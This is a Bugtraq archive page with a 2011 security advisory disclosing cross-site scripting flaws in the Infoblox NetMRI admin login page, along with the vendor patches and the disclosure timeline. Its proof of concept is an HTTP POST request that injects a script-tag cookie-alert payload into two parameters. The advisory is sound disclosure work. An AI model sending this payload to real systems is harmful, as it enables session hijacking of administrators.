Home page logo
/

bugtraq logo Bugtraq mailing list archives

[FOREGROUND SECURITY 2011-004] Infoblox NetMRI 6.2.1 Multiple Cross-Site Scripting (XSS) vulnerabilities
From: Jose Carlos de Arriba <jcarriba () foregroundsecurity com>
Date: Thu, 10 Nov 2011 18:07:53 -0600

============================================================
FOREGROUND SECURITY, SECURITY ADVISORY 2011-004
- Original release date: November 10, 2011
- Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)
- Severity: 4.3/10 (Base CVSS Score)
============================================================

I. VULNERABILITY
-------------------------
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 Multiple 
Cross Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).

II. BACKGROUND
-------------------------
Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With 
hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device 
configurations and reduces the risk of human error. 

III. DESCRIPTION
-------------------------
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 presents 
multiple Cross-Site Scripting vulnerabilities on its "eulaAccepted" and "mode" parameters in the admin login page, due 
to an insufficient sanitization on user supplied data and encoding output.
A malicious user could perform session hijacking or phishing attacks.

IV. PROOF OF CONCEPT
-------------------------
POST /netmri/config/userAdmin/login.tdf HTTP/1.1
Content-Length: 691
Cookie: XXXX
Host: netmrihost:443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false

V. BUSINESS IMPACT
-------------------------
An attacker could perform session hijacking or phishing attacks.

VI. SYSTEMS AFFECTED
-------------------------
Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable 
too).

VII. SOLUTION
-------------------------
Vulnerability fixed on 6.2.2 version - available as of 10 Nov 2011

Also the following security patches are available:

- v6.2.1-NETMRI-8831
- v6.1.2-NETMRI-8831
- v6.0.2-NETMRI-8831


VIII. REFERENCES
-------------------------
http://www.infoblox.com/en/products/netmri.html
http://www.foregroundsecurity.com/
http://www.painsec.com

IX. CREDITS
-------------------------
This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) 
painsec (dot) com).

X. REVISION HISTORY
-------------------------
- November 10, 2011: Initial release.

XI. DISCLOSURE TIMELINE
-------------------------
August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba.
August 28, 2011: Vendor contacted by email.
August 29: Vendor response asking for details.
September 21, 2011: Security advisory sent to vendor.
November 10, 2011: Security Fix released by vendor.
November 10, 2011: Security advisory released.


XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or 
otherwise.

Jose Carlos de Arriba, CISSP
Senior Security Analyst
Foreground Security
www.foregroundsecurity.com
jcarriba (at) foregroundsecurity (dot) com


  By Date           By Thread  

Current thread:
  • [FOREGROUND SECURITY 2011-004] Infoblox NetMRI 6.2.1 Multiple Cross-Site Scripting (XSS) vulnerabilities Jose Carlos de Arriba (Nov 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]